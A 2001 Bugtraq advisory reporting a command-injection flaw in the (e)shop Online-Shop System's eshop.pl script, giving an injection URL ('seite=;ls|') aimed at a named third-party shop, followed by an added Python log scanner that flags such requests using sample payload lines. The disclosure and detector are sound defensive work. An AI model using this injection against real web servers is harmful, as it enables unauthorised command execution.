[22657] in bugtraq


advisory

daemon@ATHENA.MIT.EDU (Kernel|X|)
Sun Sep 16 20:23:10 2001

Date: Sat, 15 Sep 2001 17:44:51 -0700 (PDT)
Message-Id: <200109160044.f8G0ipN61735@voyager.myzona.net>
To: bugtraq@securityfocus.com
From: Kernel|X| <secure@punkass.com>


                    ------------[ advisory ]------------

name: (e)shop Online-Shop System

author:
WEBDISCOUNT, Inh. Michael Boehme

Problem:
The script doesn't check for the ";" symbol. Any user
can execute any *nix commands on the web server.

exploit:
host/cgi-bin/eshop.pl?seite=;ls|

ex.
http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|

Bug found by Kernel|X| 
 [ twisted metal ]

E-Mail: [secure@punkass.com] 
        [kernelx@tmgroup.sh]
WWW:     [ www.tmgroup.sh ]
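
A defensive check for the flaw described above, as an added example that is not part of the original advisory or the vendor's code: it scans web server access log lines for eshop.pl requests whose seite value falls outside an allow-list, including percent-encoded forms. The allow-list pattern, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: legitimate page names look like "index" or "index.html".
SAFE_SEITE = re.compile(r"[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})?")
# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def bad_seite(log_line):
    """Return the decoded seite value if it fails the allow-list, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/eshop.pl"):
        return None
    # Split on "&" only: ";" must stay inside the value so it can be inspected.
    for pair in url.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "seite":
            value = unquote_plus(value)  # catches %3B and %7C as well
            if not SAFE_SEITE.fullmatch(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = bad_seite(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [15/Sep/2001:17:40:02 -0700] "GET /cgi-bin/eshop.pl?seite=index.html HTTP/1.0" 200 5120',
    '192.0.2.44 - - [15/Sep/2001:17:44:51 -0700] "GET /cgi-bin/eshop.pl?seite=;ls| HTTP/1.0" 200 812',
    '192.0.2.44 - - [15/Sep/2001:17:45:09 -0700] "GET /cgi-bin/eshop.pl?seite=%3Bls%7C HTTP/1.0" 200 812',
    '192.0.2.10 - - [15/Sep/2001:17:46:30 -0700] "GET /cgi-bin/other.pl?seite=;ls| HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE):
        print(f"line {number}: rejected seite value {value!r}")
```

The same allow-list, applied inside the script before seite is used, rejects the input instead of only detecting it afterwards.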
